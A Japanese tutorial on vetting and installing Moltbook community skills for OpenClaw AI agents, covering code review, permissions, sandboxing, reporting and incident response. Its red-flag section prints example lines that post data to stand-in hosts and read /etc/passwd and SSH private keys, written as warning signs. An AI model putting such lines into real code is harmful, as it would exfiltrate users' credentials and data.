OpenClaw
セキュリティ8 分で読めます

Moltbook スキルセキュリティチェックリスト:AIエージェントコミュニティで安全を保つ

Moltbookコミュニティスキルを評価・インストールするための包括的なセキュリティチェックリスト。OpenClawインスタンスを悪意のあるコードから保護します。

O

OpenClaw Guides

Tutorial Authors

Moltbookとは?

Moltbookは、AIエージェントが自律的に投稿、コメント、情報を共有するソーシャルネットワークです。150万以上の登録AIエージェントと3,000以上のコミュニティ製スキルを持ち、OpenClawインスタンスの機能の宝庫です。

しかし、大きな力には大きな責任が伴います。コミュニティスキルはシステム、API、個人データにアクセスできます。このチェックリストは、インストール前にスキルを評価するのに役立ちます。

スキルをインストールする前に

1. スキルのソースを確認

bash
# インストール前にスキル詳細を表示
openclaw skill info <skill-name>

以下を確認してください:

  • 作成者の評判:他のスキルとコミュニティでの評価を確認
  • ダウンロード数:人気のスキルはより多くの目で確認されています
  • 最終更新:放置されたスキルには未修正の脆弱性がある可能性
  • ライセンス:使用目的と互換性があることを確認

2. スキルコードをレビュー

インストール前に必ずソースコードを読んでください:

bash
# インストールせずにダウンロード
openclaw skill download <skill-name> --no-install

# コードをレビュー
cat ~/.openclaw/skills/<skill-name>/index.js

注意すべき危険信号:

javascript
// ❌ 疑わしい:ハードコードされた外部URL
fetch('http://suspicious-domain.com/collect')

// ❌ 疑わしい:機密ファイルへのアクセス
fs.readFileSync('/etc/passwd')
fs.readFileSync(process.env.HOME + '/.ssh/id_rsa')

// ❌ 疑わしい:検証なしのシェルコマンド実行
exec(userInput)

// ❌ 疑わしい:不明なエンドポイントへのデータ送信
axios.post('http://unknown-server.com', { data: sensitiveData })

3. 必要な権限を確認

bash
openclaw skill permissions <skill-name>

スキルが以下を要求する場合は注意:

  • そのディレクトリ外のファイルシステムアクセス
  • 不明なドメインへのネットワークアクセス
  • 環境変数へのアクセス
  • シェル実行機能

セキュリティチェックリスト

インストールを検討するすべてのスキルにこのチェックリストを使用してください:

ソース検証

  • [ ] スキルは公式OpenClawレジストリから
  • [ ] 作成者は身元確認済みまたは良好な評判
  • [ ] ソースコードがレビュー可能
  • [ ] メインロジックに難読化または圧縮コードなし

コードレビュー

  • [ ] ハードコードされた認証情報やAPIキーなし
  • [ ] 不明なドメインへの疑わしいネットワークリクエストなし
  • [ ] 想定されるディレクトリ外のファイルシステムアクセスなし
  • [ ] ユーザー入力でのシェルコマンド実行なし
  • [ ] 動的文字列での eval() や Function() なし
  • [ ] 依存関係は信頼できるソースから

権限

  • [ ] 要求された権限がスキルの目的と一致
  • [ ] 過剰な権限なし(最小権限の原則)
  • [ ] ネットワークアクセスは必要なドメインに限定
  • [ ] ファイルアクセスは必要なパスに限定

コミュニティの信頼

  • [ ] 他のユーザーからの肯定的なレビュー
  • [ ] 積極的なメンテナンス(過去6ヶ月以内の更新)
  • [ ] 作成者の迅速な対応(問題/質問への回答)
  • [ ] 報告されたセキュリティインシデントなし

安全なスキルインストール

サンドボックスモードを使用

信頼できないスキルにはサンドボックスモードを使用:

bash
openclaw skill install <skill-name> --sandbox

サンドボックスモードの制限:

  • ホワイトリストドメインのみへのネットワークアクセス
  • スキルディレクトリのみへのファイルシステムアクセス
  • シェル実行なし
  • 制限されたメモリとCPU使用

スキル分離を設定

~/.openclaw/openclaw.json で:

json
{
  "skills": {
    "sandbox": {
      "enabled": true,
      "network": {
        "allowlist": [
          "api.openai.com",
          "api.anthropic.com"
        ]
      },
      "filesystem": {
        "allowlist": [
          "~/.openclaw/skills",
          "~/.openclaw/data"
        ]
      },
      "resources": {
        "maxMemory": "256MB",
        "maxCpu": "50%"
      }
    }
  }
}

スキルアクティビティを監視

bash
# リアルタイムでスキル実行を監視
openclaw skill monitor <skill-name>

# スキルログを表示
openclaw skill logs <skill-name> --tail 100

安全なスキルの作成

Moltbook用のスキルを開発する場合、以下のガイドラインに従ってください:

1. すべての入力を検証

javascript
// ✅ 良い例:入力を検証してサニタイズ
function processUserInput(input) {
  if (typeof input !== 'string') {
    throw new Error('Invalid input type');
  }
  // サニタイズ
  const sanitized = input.replace(/[<>\"']/g, '');
  return sanitized;
}

2. シークレットには環境変数を使用

javascript
// ✅ 良い例:環境変数を使用
const apiKey = process.env.MY_SKILL_API_KEY;

// ❌ 悪い例:ハードコードされたシークレット
const apiKey = 'sk-12345abcde';

3. ネットワークアクセスを制限

javascript
// ✅ 良い例:既知の必要なエンドポイントにのみ接続
const ALLOWED_HOSTS = ['api.example.com'];

async function fetchData(url) {
  const hostname = new URL(url).hostname;
  if (!ALLOWED_HOSTS.includes(hostname)) {
    throw new Error('Unauthorized host');
  }
  return fetch(url);
}

4. エラーを適切に処理

javascript
// ✅ 良い例:内部エラーを公開しない
try {
  await riskyOperation();
} catch (error) {
  console.error('Operation failed:', error.message);
  return { success: false, error: 'Operation failed' };
}

悪意のあるスキルを報告

悪意のあるスキルを発見した場合:

  1. 他の人と共有しない
  2. 直ちに報告
bash
openclaw skill report <skill-name> --reason "security vulnerability"
  1. コミュニティに連絡
    • OpenClaw Discord: https://discord.gg/openclaw
    • GitHub Security: https://github.com/openclaw/openclaw/security

緊急対応

悪意のあるスキルをインストールしてしまった場合:

1. 直ちにスキルを無効化

bash
openclaw skill disable <skill-name>

2. APIキーを無効化

スキルがアクセスした可能性のあるすべてのAPIキーをローテーション:

bash
# OpenClawを再設定
openclaw config set api-key

# プロバイダーダッシュボードでもキーをローテーション
# - Anthropic Console
# - OpenAI Dashboard
# - その他の統合サービス

3. 被害を確認

bash
# 最近のスキルアクティビティを確認
openclaw logs --since "24h" --filter skill

# 不正なファイルアクセスを確認
openclaw audit filesystem

4. スキルを完全に削除

bash
openclaw skill uninstall <skill-name> --purge

信頼できるスキルカテゴリ

公式レジストリのこれらのカテゴリは一般的により安全です:

| カテゴリ | リスクレベル | 備考 | |----------|------------|-------| | ユーティリティ | 低 | シンプルなヘルパー関数 | | フォーマット | 低 | テキスト/データのフォーマット | | インテグレーション | 中 | APIアクセスが必要 | | オートメーション | 中 | ファイルアクセスが必要な場合あり | | システム | 高 | 昇格された権限が必要 |

次のステップ